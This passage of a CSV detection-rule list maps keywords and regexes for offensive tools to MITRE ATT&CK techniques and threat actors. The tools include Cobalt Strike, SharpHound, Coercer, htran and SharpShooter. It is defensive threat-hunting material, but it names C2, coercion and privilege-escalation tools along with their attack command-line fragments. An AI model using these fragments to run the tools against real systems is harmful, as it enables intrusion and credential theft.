coap-resources.nse*",".{0,1000}\scoap\-resources\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","622" "* -cobalt *",".{0,1000}\s\-cobalt\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat 
Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","623" "* cobaltstrike*",".{0,1000}\scobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","624" "* Code by lion & bkbll, Welcome to http://www.cnhonker.com *",".{0,1000}\sCode\sby\slion\s\&\sbkbll,\sWelcome\sto\shttp\:\/\/www\.cnhonker\.com\s.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","625" "* coerce * --dc-ip *",".{0,1000}\scoerce\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","626" "* coerce -u * -p * --listener-ip*",".{0,1000}\scoerce\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-listener\-ip.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","627" "* CoercedPotato.cpp*",".{0,1000}\sCoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","628" "* Coercer.py*",".{0,1000}\sCoercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","629" "* --coff-arg *",".{0,1000}\s\-\-coff\-arg\s.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","630" "* CoffeeExecuteFunction*",".{0,1000}\sCoffeeExecuteFunction.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 
Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","631" "* COFFLoader.exe*",".{0,1000}\sCOFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","632" "* collect activedirectory --*",".{0,1000}\scollect\sactivedirectory\s\-\-.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","635" "* --collectallproperties*",".{0,1000}\s\-\-collectallproperties.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","636" "* --CollectionMethod All 
*ldap*",".{0,1000}\s\-\-CollectionMethod\sAll\s.{0,1000}ldap.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","637" "* --CollectionMethod All *--ZipFileName *.zip*",".{0,1000}\s\-\-CollectionMethod\sAll\s.{0,1000}\-\-ZipFileName\s.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","638" "* -CollectionMethod All*loggedon*",".{0,1000}\s\-CollectionMethod\sAll.{0,1000}loggedon.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1552 - T1027 - T1059 - T1087","TA0003 - TA0002 - TA0007","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","639" "* -CollectionMethod LoggedOn -Verbose*",".{0,1000}\s\-CollectionMethod\sLoggedOn\s\-Verbose.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","640" "* -CollectionMethod stealth*",".{0,1000}\s\-CollectionMethod\sstealth.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-SPN.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","641" "* --collectionmethods ACL*",".{0,1000}\s\-\-collectionmethods\sACL.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","642" "* --collectionmethods ComputerOnly*",".{0,1000}\s\-\-collectionmethods\sComputerOnly.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","643" "* --collectionmethods Container*",".{0,1000}\s\-\-collectionmethods\sContainer.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","644" "* --collectionmethods DCOM",".{0,1000}\s\-\-collectionmethods\sDCOM","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","645" "* --collectionmethods DCOnly*",".{0,1000}\s\-\-collectionmethods\sDCOnly.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","646" "* --collectionmethods GPOLocalGroup*",".{0,1000}\s\-\-collectionmethods\sGPOLocalGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","647" "* --collectionmethods Group*",".{0,1000}\s\-\-collectionmethods\sGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","648" "* --collectionmethods LocalGroup*",".{0,1000}\s\-\-collectionmethods\sLocalGroup.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","649" "* --collectionmethods LoggedOn*",".{0,1000}\s\-\-collectionmethods\sLoggedOn.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","650" "* --collectionmethods ObjectProps*",".{0,1000}\s\-\-collectionmethods\sObjectProps.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","651" "* --collectionmethods PSRemote*",".{0,1000}\s\-\-collectionmethods\sPSRemote.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","652" "* --collectionmethods RDP*",".{0,1000}\s\-\-collectionmethods\sRDP.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","653" "* --collectionmethods Session*",".{0,1000}\s\-\-collectionmethods\sSession.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","654" "* --collectionmethods Trusts*",".{0,1000}\s\-\-collectionmethods\sTrusts.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","655" "* --CollectLinks --apitoken * --outfile *",".{0,1000}\s\-\-CollectLinks\s\-\-apitoken\s.{0,1000}\s\-\-outfile\s.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","656" "* --com xslremote --awlurl *",".{0,1000}\s\-\-com\sxslremote\s\-\-awlurl\s.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","657" "* com.blackh4t*",".{0,1000}\scom\.blackh4t.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","658" "* COMHijackToolkit.ps1*",".{0,1000}\sCOMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","659" "* --command * --output payload*",".{0,1000}\s\-\-command\s.{0,1000}\s\-\-output\spayload.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","660" "* -command *.exe* -technique ccmstp*",".{0,1000}\s\-command\s.{0,1000}\.exe.{0,1000}\s\-technique\sccmstp.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","661" "* command_exec.exe*",".{0,1000}\scommand_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","662" "* 